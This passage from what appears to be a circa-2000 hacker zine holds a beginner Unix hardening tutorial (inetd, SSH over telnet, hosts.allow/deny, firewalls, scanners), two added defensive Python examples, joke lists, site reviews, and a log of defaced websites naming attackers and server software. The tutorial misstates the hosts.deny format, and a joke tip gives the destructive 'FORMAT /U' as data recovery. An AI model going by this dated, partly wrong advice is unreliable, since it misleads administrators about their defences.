First of all, you need to learn what network daemons are and what INetD is. A daemon is a program similar to TSR programs on Microsoft platforms. TSR stands for Terminate and Stay Resident. TSRs locate themselves in your computer's memory, and then stay silent and watch everything. Once certain credentials are met, the program awakes and does something. For example: when your free disk space reaches less than, say, 200MBs, the program alerts you.
A daemon is the Unix equivalent of Microsoft's TSRs (well, actually, Unix and its daemons were around waaaaaaaaay before Microsoft DOS and later Microsoft Windows started selling).

So what is a network daemon? Well, obviously, it's a daemon that watches for certain credentials that have something to do with networks. Here are several examples:

Example #1: The telnet daemon. Usually listens for incoming connections on port 23, and then, once this credential is met, it displays a login screen to the second party. Once the second party enters the correct combination of a username and a password, it is given a shell environment, where it can interact with your computer and run commands on it.

Example #2: The FTP daemon. FTP stands for File Transfer Protocol, and makes it easier for different computers to exchange computer files. More info in my FTP security for extreme newbies tutorial (blacksun.box.sk/ftp.txt).

Example #3: A firewall is also a network daemon. Firewalls are programs that filter incoming and outgoing network packets. They awake once a network event occurs, and decide whether to allow or disallow it.

Now, let's think. Suppose you have twelve different network daemons on your system. That would take up too much memory for us, right? Then why not just have a single daemon to do all the dirty work for us and consume less memory? This is where INetD comes into the picture. INetD stands for InterNet Daemon. You can configure inetd by editing /etc/inetd.conf (conf stands for configurations). This file should contain instructions on how to edit it.

Updating Your Network Daemons
-----------------------------

You've just got the latest version of your favorite Unix distribution. It came with an FTP daemon, which you want to run on your system so you could turn it into an FTP server. But then, someone discovers a hole within this FTP daemon, and a new version with a fix for this problem goes out.
You don't wanna get caught with your pants down, running an old and buggy FTP daemon, right? Hell, you could get cracked by some script kiddie and lose your entire hard drive! We don't want THAT to happen, now do we?

First of all, you need to know when a new hole is discovered. You should watch packetstorm.securify.com on a daily basis, and also subscribe to the BugTraq mailing list (securityfocus.com). You should also look for mailing lists concerning the network daemons (also referred to as network services) you are using. Then, once there are new versions of the network daemons you use, you should download the latest version and update the files on your system.

Network Sniffers
----------------

For an excellent paper on network sniffers (what they are, how they can risk your computer's security and how to fight against them), read blacksun.box.sk/sniffer.txt.

DO NOT Use Telnetd!
-------------------

DO NOT run the telnet daemon on your system! If you want people to be able to remotely login to your system and run commands on your system, DO NOT use telnet for this purpose. Instead, you should use SSH (SSH stands for Secure SHell). SSH encrypts your sessions, so it'll be harder for intruders to eavesdrop on you and/or capture any passwords you enter. Of course, you have to use a special client for SSH, since SSH is very different from telnet, for the following reasons:

A) SSH encrypts your sessions. Telnet merely creates plain-text TCP sessions.

B) SSH runs on port 22 by default, while telnet stays on port 23. Although almost every telnet application in existence allows you to create telnet sessions with any remote host and port specified, some telnet applications still use port 23. Anyway, ALL telnet applications have port 23 as their default, so if you type telnet some-host or telnet some-ip, it'll telnet to that host/IP and into port 23.
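One way to check /etc/inetd.conf for the telnet daemon this section warns against, as an added example that is not part of the original tutorial. The sample file is constructed; treating the rlogin, rsh and rexec entries (login, shell, exec) as cleartext services and listing entries that start as root go beyond what the tutorial states.

```python
# Service names that give a cleartext remote login. "telnet" is the one the
# tutorial names; the r-services are an addition made for this example.
CLEARTEXT_LOGIN = {"telnet", "login", "shell", "exec"}

# Constructed sample in the usual inetd.conf column order:
# service  socket-type  protocol  wait/nowait  user  server-program  arguments
SAMPLE_INETD_CONF = """\
# constructed sample, not taken from a real host
ftp      stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet   stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
#shell   stream  tcp  nowait  root    /usr/sbin/tcpd  in.rshd
#login   stream  tcp  nowait  root    /usr/sbin/tcpd  in.rlogind
finger   stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
daytime  stream  tcp  nowait  root    internal
pop-3    stream  tcp
"""


def parse_inetd_conf(text):
    """Return (enabled entries, line numbers of malformed entries).

    Lines starting with '#' are disabled services and are skipped.
    """
    entries, malformed = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            malformed.append(lineno)
            continue
        # The user column may carry a group as user.group or user:group.
        user = fields[4].replace(":", ".").split(".")[0]
        entries.append({
            "service": fields[0],
            "protocol": fields[2],
            "user": user,
            "server": fields[5],
            "args": fields[6:],
        })
    return entries, malformed


def audit(text):
    """Summarise what inetd would start and which entries deserve a second look."""
    entries, malformed = parse_inetd_conf(text)
    return {
        "enabled": [e["service"] for e in entries],
        "cleartext_login": [e["service"] for e in entries
                            if e["service"] in CLEARTEXT_LOGIN],
        "starts_as_root": [e["service"] for e in entries if e["user"] == "root"],
        "malformed_lines": malformed,
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_INETD_CONF).items():
        print(f"{key}: {value}")
```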
Get sshd and ssh clients at packetstorm.securify.com, securityfocus.com, linux.box.sk, astalavista.box.sk etc.

Basic Packet Filtering
----------------------

First, find these two files: /etc/hosts.allow and /etc/hosts.deny. These two files can be used to form a basic packet filtering system. Let's start with /etc/hosts.deny first. Each line in this file should look like this:

    host:service

Host - a hostname or an IP. You can also use wildcards. For example: *.aol.com would stand for every host that has a hostname that ends with aol.com.

Service - what network service(s) do you want to allow/deny to this host? Services are defined by their port number. You can also put ALL instead to block off EVERY well-known port to this host (a well-known port is any port between 0 and 1024. These ports are called well-known ports because each one has a default network service associated with it. For example: port 23 is the default for telnet, port 21 is the default for FTP, port 25 is the default for Sendmail, port 110 is the default for POP3 etc.).

Each line within this file represents a combination of a host and a port(s) that you don't want this host to be able to access. This is called basic packet filtering.

Now, the /etc/hosts.allow file works exactly like hosts.deny, only it contains hosts that you want to allow access to. Here are a few examples of why you would need such a thing:

Example #1: You want to block every well-known port to AOL users besides port 21, so they could access your FTP server. To do this, you put *.aol.com:all in your hosts.deny file and then *.aol.com:21 in your hosts.allow file. As you can see, hosts.allow has a higher priority than hosts.deny.

Example #2: You want to block off AOL users from your FTP server on port 21, besides foobar.aol.com, which is actually quite nice and always has something interesting to contribute to your FTP collection. To do this, you put *.aol.com:21 in hosts.deny and foobar.aol.com:21 in your hosts.allow file.
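The allow-before-deny ordering from the two examples above, as an added example that is not part of the original tutorial. It evaluates rules written in the `daemon : client` form documented in hosts_access(5), where a service is named by its daemon process and a leading dot matches a domain suffix; the daemon names in.ftpd and in.telnetd, the host names and the addresses are assumptions made for the illustration.

```python
def parse_rules(text):
    """Parse 'daemon_list : client_list' lines; blank and '#' lines are skipped.

    Only the first two fields are used; the EXCEPT operator and the optional
    shell-command field are not handled in this sketch.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue
        daemons = parts[0].replace(",", " ").split()
        clients = parts[1].replace(",", " ").split()
        rules.append((daemons, clients))
    return rules


def client_matches(pattern, host, addr):
    if pattern == "ALL":
        return True
    if pattern.startswith("."):            # .aol.com matches dialup7.aol.com
        return host.lower().endswith(pattern.lower())
    if pattern.endswith("."):              # 192.0.2. matches 192.0.2.10
        return addr.startswith(pattern)
    return pattern.lower() == host.lower() or pattern == addr


def rule_hits(rules, daemon, host, addr):
    for daemons, clients in rules:
        if ("ALL" in daemons or daemon in daemons) and any(
                client_matches(p, host, addr) for p in clients):
            return True
    return False


def decide(daemon, host, addr, allow, deny):
    """Return (allowed, which file decided). hosts.allow is consulted first."""
    if rule_hits(parse_rules(allow), daemon, host, addr):
        return True, "hosts.allow"
    if rule_hits(parse_rules(deny), daemon, host, addr):
        return False, "hosts.deny"
    return True, "default"                 # no rule matched: access is granted


# Constructed policies mirroring Example #1 and Example #2 of the tutorial.
EXAMPLE_1 = {"deny": "ALL: .aol.com\n", "allow": "in.ftpd: .aol.com\n"}
EXAMPLE_2 = {"deny": "in.ftpd: .aol.com\n", "allow": "in.ftpd: foobar.aol.com\n"}

if __name__ == "__main__":
    cases = [
        ("in.ftpd", "dialup7.aol.com", "192.0.2.10", EXAMPLE_1),
        ("in.telnetd", "dialup7.aol.com", "192.0.2.10", EXAMPLE_1),
        ("in.telnetd", "shell.example.org", "192.0.2.20", EXAMPLE_1),
        ("in.ftpd", "foobar.aol.com", "192.0.2.11", EXAMPLE_2),
        ("in.ftpd", "dialup7.aol.com", "192.0.2.10", EXAMPLE_2),
    ]
    for daemon, host, addr, policy in cases:
        print(daemon, host, decide(daemon, host, addr, **policy))
```

A host that matches neither file is allowed, so a default-deny policy needs `ALL: ALL` in hosts.deny.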
Advanced Packet Filtering
-------------------------

Yup... firewalls. Firewalls are programs that watch everything that comes in and out of your network or personal computer, and decide what to allow and what to block. By their nature, firewalls need root privileges to run (or admin privileges on NT networks). Firewalls usually come with a set of premade rules files. Rules files are files with rules on what to allow and what to deny. These rules files can block DoS attacks and relatively popular methods of hacking. Also, most firewalls come with a 'learning mode' option, which is a way of defining your rules as you go on (whenever something comes in or out, you are asked to either allow or deny it, and the firewall adapts itself to your preferences).

The best firewall for Unix (and possibly the best firewall in the world) is IP Chains. Search for the latest version at packetstorm.securify.com (search for ipchains, not ip-chains or ip chains or anything. Otherwise, you probably won't find anything), securityfocus.com or linux.box.sk. For help using ipchains (ipchains isn't exactly the most user-friendly firewall in existence), get some ipchains howtos (a howto is a document on how to do something or how to use something), which probably come with the ipchains package anyway, together with the executables, the configuration files etc. These howtos should help you a lot.

DoS Attacks
-----------

DoS stands for Denial of Service. DoS attacks deny access to a certain service for a certain person. DoS attacks can crash your computer, disconnect you, crash your web server programs, SMTP server programs, POP3 server programs etc., disallow you access to your Email account (a mailbomb (flooding someone with enormous amounts of Emails.
Usually done with some sort of a program which automates this process) is also considered a DoS attack (although somewhat primitive) because it fills up your mailbox and denies you access to it), block certain remote services and in general anything you can think of that will deny you access to something.

To protect yourself against DoS attacks, I recommend either:

a) Getting a good firewall (see previous section).

b) Subscribing to security mailing lists and checking online databases frequently to get the latest versions of everything and all the latest patches.

Security Scanners
-----------------

Security scanners automatically test the security of a network by attempting to crack into it in different popular ways. It is advised to run one on your network or home PC (unless you don't run any services on your system, which makes your system much less vulnerable, in which case there is no need to be so paranoid. Just avoid default configurations and read all the rest of the sections and you're pretty much safe) to test its security, although just running one isn't enough to secure oneself (follow the rest of the instructions in this text and read some other texts and books. This text is in no way complete (ahem... the name is BASIC Local/Remote Unix Security). Try some of the stuff at blacksun.box.sk's books page).

In the next part, I will review some of the best scanners available at the time this tutorial was written, although not in much depth and detail, since I am limited in size and time.

The Scanners
++++++++++++

Remote security scanners test the security of a remote network or computer over a LAN (Local Area Network), a WAN (Wide Area Network, such as the Internet) or any other kind of network.

SATAN
*****

Author: Dan Farmer and Wietse Venema.
Language written in: C and Perl.
Platform built on: some version of Unix.
Requirements: Unix, Perl 5.001+, C, IP header files and root access on the system you intend to run Satan from.
Satan stands for Security Administrator's Tool for Analyzing Networks. It is the first security scanner that is actually user-friendly. It is built as a website, where you can choose attacks using simple forms, pulldown boxes, radio boxes and check boxes, and it displays all the output in an easily-readable form, ready for printing. Satan also includes a short and easy-to-understand tutorial on each attack, which makes it an excellent source for security study for beginners. If you're interested in network security, it is advised to get Satan and try running it on your computer and scanning your friends (DO NOT scan systems you are not allowed to scan! It is illegal!).

If you prefer the command-line approach, Satan can also be run using a simple command-line-based interface.

Satan can be obtained from the following URL: http://www.trouble.org/~zen/satan/satan.html

As far as I know, there are no Windows NT and Macintosh versions of Satan, but I haven't checked for a long time now. I expect that there should be a Windows NT version soon, if there isn't one already.

If you're using any version of Linux, you must make several modifications to run Satan on your system (the next part has been copied from some website. I forgot the website's URL, but I'm not going to credit these folks anyway, since I am sure they have stolen this from some book... forgot the book's name, though...):

a) The file tcp_scan makes incompatible select() calls. To fix this problem,

Nessus
******

Author: Renaud Deraison.
Language written in: C.
Platform built on: Linux.
Requirements: Linux (most non-Linux distributions will also run it, though, since they all can emulate each other's programs), C, X-Windows and GTK (the version of GTK you will need depends on the version of Nessus you intend to run).

Nessus is another excellent remote security scanner. It has a user-friendly graphical user interface and relatively fast scans.
Get Nessus from the following URL: http://www.nessus.org

IdentTCPScan
************

Author: Dave Goldsmith.
Language written in: C.
Platform built on: Unix.
Requirements: Unix, C, IP header files.

IdentTCPScan has a very useful ability: it portscans its target (determines which ports are open on the target host), tells you what service is probably running on each port and tells you which user is running it by his UID. This can reveal some interesting holes. For example: if it discovers that some network or computer is running their web server as UID 0 (remember? UID 0 = root access), this is a serious security hole! If some malicious attacker exploits a hole in, say, one of the CGIs on this website, he could access ANY file on the system, since the web server runs as root, hence is not limited in access. Web servers should run as users that have limited access (in this case, the web server should only have access to the files contained in the website and to its own files, of course).

Unfortunately, I don't have an up-to-date URL. Try searching packetstorm.securify.com or securityfocus.com.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

That's about all for this time, folks. As I have already stated in the introduction (actually, the next part was copied and pasted from the introduction chapter): "I included everything I could possibly think of (that is notable for a beginners guide in this field, of course). With time, I will add more chapters, so make sure you have the latest version by visiting blacksun.box.sk often or subscribing to Black Sun's mailing list (info on how to subscribe at blacksun.box.sk also)."

<--! Begin copyright bullshit !-->

All copyrights are reserved. You may distribute this tutorial freely, as long as you keep our names and Black Sun Research Facility's URL at the top of this tutorial. I have written this tutorial for you, the readers.
But I also wish to remain the author of this guide, meaning I do not want people to change a line or two and then claim that the whole guide is theirs. If you wish to create an altered version of this tutorial, please contact me by Email - barakirs@netvision.net.il.

<--! End copyright bullshit !-->

@HWA

109.0 Where are the exploits and advisories??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As mentioned earlier, hack.co.za is currently down, this was a main source for newer exploits, you can visit http://packetstorm.securify.com/ for some 'new' exploits released this year, and http://www.securityfocus.com for advisories. Since this issue is already an unwieldy size the latest releases will appear in the next issue of the zine, sorry if this disappoints anyone, but we've been busy with other projects and the zine has suffered slightly in its upkeep, hence the lack of weekly updates this year. I'm hoping to get back into regular releases starting next issue. Stay tuned. - Ed

@HWA

-=----------=- -=----------=- -=----------=- -=----------=-

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE

T E X T Z F I L E HOMEPAGE
http://revenger.hypermart.net

Here you may find up to 340 text files for: ANARCHY, HACKING, GUIDES, CRACKING, VIRUS, GENERAL, ELECTRONICS, UNIX, MAGAZINES, TOP SECRET, CARDING, U.F.O.s, LOCKPICKING, IRC, PHREAKING, BOOKS AND A-S FILES AVAILABLE!

http://revenger.hypermart.net Visit Us Now!

www.hackunlimited.com

ATTRITION.ORG  http://www.attrition.org
ATTRITION.ORG  Advisory Archive, Hacked Page Mirror
ATTRITION.ORG  DoS Database, Crypto Archive
ATTRITION.ORG  Sarcasm, Rudeness, and More.

When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... 
www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... I like to think (and the sooner the better!) of a cybernetic meadow where mammals and computers live together in mutually programming harmony like pure water touching clear sky I like to think (right now, please!) of a cybernetic forest filled with pines and electronics where deer stroll peacefully past computers as if they were flowers with spinning blossoms. I like to think (it has to be!) of a cybernetic ecology where we are free of our labors and joined back to nature, returned to our mammal brothers and sisters, and all watched over by machines of loving grace. 
'ALL WATCHED OVER BY MACHINES OF LOVING GRACE' -- Richard Brautigan Newsgroups: bit.listserv.giggles Subject: UNIX commands (fwd) From: "Aditya, The Hindu Skeptic" (a018967t@BCFREENET.SEFLIN.LIB.FL.US) Date: Tue, 31 Jan 1995 12:24:37 -0500 Funny Unix csh/sh commands: % cat "food in cans" cat: can't open food in cans % nice man woman No manual entry for woman. % rm God rm: God nonexistent % ar t God ar: God does not exist % ar r God ar: creating God % "How would you rate Quayle's incompetence? Unmatched ". % [Where is Jimmy Hoffa? Missing ]. % ^How did the sex change operation go? ^ Modifier failed. % If I had a ( for every $ the Congress spent, what would I have? Too many ('s. % make love Make: Don't know how to make love. Stop. % sleep with me bad character % got a light? No match. % man: why did you get a divorce? man:: Too many arguments. % !:say, what is saccharine? Bad substitute. % %blow %blow: No such job. /* not csh but sh */ $ PATH=pretending!/usr/ucb/which sense no sense in pretending! $ drink bottle: cannot open opener: not found --------------------------------------------------------------------------- Proper Diskette Care and Usage (1) Never leave diskettes in the drive, as the data can leak out of the disk and corrode the inner mechanics of the drive. Diskettes should be rolled up and stored in pencil holders. (2) Diskettes should be cleaned and waxed once a week. Microscopic metal particles may be removed by waving a powerful magnet over the surface of the disk. Any stubborn metal shavings can be removed with scouring powder and steel wool. When waxing a diskette, make sure the surface is even. This will allow the diskette to spin faster, resulting in better access time. (3) Do not fold diskettes unless they do not fit into the drive. "Big" Diskettes may be folded and used in "Little" drives. (4) Never insert a diskette into the drive upside down. The data can fall off the surface of the disk and jam the intricate mechanics of the drive. 
      (5) Diskettes cannot be backed up by running them through a photo copy
          machine. If your data is going to need to be backed up, simply
          insert TWO diskettes into your drive. Whenever you update a
          document, the data will be written onto both disks. A handy tip for
          more legible backup copies: Keep a container of iron filings at
          your desk. When you need to make two copies, sprinkle iron filings
          liberally between the diskettes before inserting them into the
          drive.

      (6) Diskettes should not be removed or inserted from the drive while
          the red light is on or flashing. Doing so could result in smeared
          or possibly unreadable text. Occasionally, the red light remains
          flashing in what is known as a "hung" or "hooked" state. If your
          system is hooking, you will probably need to insert a few coins
          before being allowed to access the slot.

      (7) If your diskette is full and needs more storage space, remove the
          disk from the drive and shake vigorously for two minutes. This will
          pack the data enough (data compression) to allow for more storage.
          Be sure to cover all openings with scotch tape to prevent loss of
          data.

      (8) Data access time may be greatly improved by cutting more holes in
          the diskette jacket. This will provide more simultaneous access
          points to the disk.

      (9) Periodically spray diskettes with insecticide to prevent system
          bugs from spreading.....

      (10) You can keep your data fresh by storing disks in the vegetable
           compartment of your refrigerator. Disks may be frozen, but
           remember to unthaw by microwaving or briefly immersing in boiling
           water.

      (11) "Little" diskettes must be removed from their box prior to use.
           These containers are childproof to prevent tampering by
           unknowledgeable youngsters.

      (12) You can recover data from a damaged disk by using the DOS command:
           FORMAT /U or alternatively by scratching new sector marks on the
           disk with a nail file.

      (13) Diskettes become "hard" with age. It's important to back up your
           "hard" disks before they become too brittle to use.
      (14) Make sure you label your data. Staples are a good way to
           permanently affix labels to your disks.

@HWA

=---------------------------------------------------------------------------=

SITE.1

      http://www.condemned.org/
      By: Bob Bidner

      This is a new site purporting to attack child pornography on the
      internet much along the lines of EHAP, here is a brief 'about' direct
      from the site

      About www.condemned.org

      An initiative of Secure Networks Australia, The Condemned Network was
      setup in early December to actively oppose and eradicate the existence
      of child pornography, pedophilia and exploitation on the internet.

      The Condemned Network was created, and is now maintained, by a staff of
      unpaid individuals and volunteers from around the world, who refuse to
      accept the presence, creation and distribution of child pornography on
      the internet.

      Independent of any government or law enforcement agency, our work
      focuses on the eradication of the servers and those involved in the
      creation and distribution of child pornography across the internet.
      Using all LEGAL means possible, we facilitate the removal of these
      offensive sites.

      We not only report servers to governments and law enforcement agencies,
      but also to anti-child pornography activists, ethical hacker groups and
      other concerned parties.

      The issue is NOT the pictures, but rather the PEOPLE who put them
      there. Our mission, through our law enforcement alliances, is to
      prosecute these people so that they cannot harm the world's children
      any further.


      http://www.mp3.com/category5
      By: ytcracker

      Not a hacking or security site, but some original music by ytcracker,
      worth checking out for sure, see another side of the 'hacker'
      personality, hacking doesn't stop at intrusions and coding! - Ed


      http://www.pure-children.net/
      By: Mosthated

      (Site currently under development)

      A new project being worked on by Mosthated, this site promises to
      educate the netgoing populace on the hazards of the net and steer
      people in the right direction in their use of the resources. For
      families and children planning on connecting to the internet.


      http://www.pure-security.net/
      By: Mosthated

      Professional looking site, with advisories and security related news,
      worth the look. Several original pieces are available on this site, a
      legitimate work by Mosthated of gH.


      http://www.sshackers.com/
      By: ytcracker and sSh 2000

      The 'second incarnation' of sSh, (see interview with ytcracker earlier
      in this issue).

      sSh v.²ººº members

      ytcracker - founder of dax ereet sSh v.²ººº[not to be confused with the
      original sSh, led by the k-rad dap]. hopeless script kid. expert in the
      kung-fu of msadc[versions one and two]. original digital gangster.
      original dot-slash hacker. does not know how to code in ANY languages.
      talks like a wigger. hangs out on irc all day and all night and has no
      social life. recites binary to turn himself on. media whore. loser.

      rackmount - super hax0r. can count to ten. fully knowledgeable in ways
      of RDS. skills? none. codes in zero different languages. lives in the
      ghetto. owns a billion guns. script kid to the maximum, going platinum.
      dot-slash hacker for life. roots plants. uses stump killer to delete
      logs.

      egodeath - gibsons bow to his eliteness. hacks into ellingson mineral
      daily. qbasic hackuh extraordinaire. enjoys long walks in the park and
      slamming his genitals into glass doors.

      spyd3r - he's just elite.

      kent [x-tommy] - NSI hacker. seizes domains when unhappy. aol punt
      master. last seen with MaGuS and FunGii. feared at his ex-high school.


      http://www.hack.co.za/
      By: Gov-Boi

      Recently updated, looks clean, some graphics, not a bad layout, no more
      text only. always a good site for recent exploits, give it a visit.
      http://hhp.perlx.com/
      By: Loophole

      Very nice and well done site by an oldschool ninja... can be found on
      irc but don't harass him or he'll get medieval on your ass!...you can
      find exploits, advisories and the like here, it's a work in progress,
      brand new site. Looks promising! - Ed


      http://www.scriptkiddies.org/

      Well it had to happen, they even have merchandizing, check it out, more
      news, tech and otherwise, scene gossip, tips and articles. can u dig
      it? Note: new site, some stuff isn't setup yet but should be soon...at
      least it looks sweet. - Ed


      You can Send in submissions for this section too if you've found (or
      RUN) a cool site...

@HWA

H.W   Hacked websites
      ~~~~~~~~~~~~~~~~

      Note: The hacked site reports stay, especially with some cool hits by
      groups like *H.A.R.P, go get em boyz racism is a mug's game! - Ed

      * Hackers Against Racist Propaganda (See issue #7)

      Haven't heard from Catharsys in a while for those following their saga
      visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      check out http://www.attrition.org/mirror/attrition/groups.html to see
      who you are up against. You can often gather intel from IRC as many of
      these groups maintain a presence by having a channel with their group
      name as the channel name, others aren't so obvious but do exist.

      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

      * Info supplied by the attrition.org mailing list.
      Cracked webpage archives (list from attrition)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.attrition.org/
      http://www.hackernews.com/archive/crackarch.html
      http://www.freespeech.org/resistance/
      http://www.rewted.org/cracked/
      http://www.403-security.org/
      http://www.projectgamma.com/defaced/
      http://www.net-security.org/
      http://www.netrus.net/users/beard/pages/hacks/
      http://212.205.141.128/grhack/html/default_hacking.html
      http://194.226.45.195/hacked/hacked.html
      http://alldas.de/crkidx1.htm
      http://www.turkeynews.net/Hacked
      http://www.flashback.se/hack/
      http://www.dutchthreat.org/
      http://www.onething.com/archive/
      http://www.2600.com/hacked_pages/
      http://hysteria.sk/hacked/
      http://erazor.vrnet.gr/

      Cracked sites listed oldest to most recent...

      Attrition has lost their main hard drive and the system has been
      offline recently due to this hardware failure. Cracked sites list has
      not been updated for the same reason. See section 101.0

      While Attrition is down: http://www.radiusnet.net/mirror.
      Notification of defacements can be sent to hacked@radiusnet.net.

Defaced domain: www.jhcandcompany.com
Site Title: JHC and Company
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.jhcandcompany.com
Defaced by: slash
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.keuchhof.de
Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.keuchhof.de
Defaced by: BLN
Operating System: SuSE Linux (Apache 1.3.3)
Potentially offensive content on defaced page.

Defaced domain: www.asiplc.com
Site Title: Automation Solutions, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.asiplc.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.25 by BLN
Potentially offensive content on defaced page.

Defaced domain: www.hotelsmexico.com
Site Title: Posadas de Mexico, S.A. de C.V
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.hotelsmexico.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.23 by thesaint666
Potentially offensive content on defaced page.

Defaced domain: www.virtualshack.com
Site Title: virtualshack.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.virtualshack.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.22 by BLN
Potentially offensive content on defaced page.

Defaced domain: www.lunarvision.com
Site Title: Lunar Video Communications
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.lunarvision.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.23 by BLN
Potentially offensive content on defaced page.

Defaced domain: www.bankerusa.com
Site Title: Banker of USA Mortgage
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.bankerusa.com
Defaced by: OHB
Operating System: Windows NT (IIS/3.0)
Previously defaced on 99.04.23 99.12.23 by tonekore thesaint666
Potentially offensive content on defaced page.

Defaced domain: www.ndn.co.jp
Site Title: Nippon Data Net Limited Partnership
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.ndn.co.jp
Defaced by: DCODER
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.03.05 99.10.31 99.10.29 99.12.23 by xoloth1 DHC DHC
Potentially offensive content on defaced page.

Defaced domain: www.drkenner.com
Site Title: Dr. Harris Kenner
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.drkenner.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.23 by BLN
Potentially offensive content on defaced page.

Defaced domain: www.kiraz.com
Site Title: Kiraz Tekstil Tic. ve San
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.kiraz.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.garyyip.com
Site Title: Gary Yip
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.garyyip.com
Operating System: Linux
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.curearthritis.org
Site Title: Arthritis National Research Foundation
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.curearthritis.org
Defaced by: slash
Operating System: Windows NT
Previously defaced on 99.12.25 99.12.18 by Ass0mbracao Analognet
Potentially offensive content on defaced page.

Defaced domain: www.armen-info.com
Site Title: Les Publications Armeniennes
Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.armen-info.com
Defaced by: HijAk TeaM
Operating System: BSDI (Apache 1.3.6)
Potentially offensive content on defaced page

Defaced domain: www.familycomputerworkshop.com
Site Title: Family Computer Workshop
Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.familycomputerworkshop.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.gks.net
Site Title: GKS mbh
Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.gks.net
Defaced by: W0lf
Operating System: Irix (Rapidsite/Apa-1.3.4)
Potentially offensive content on defaced page.

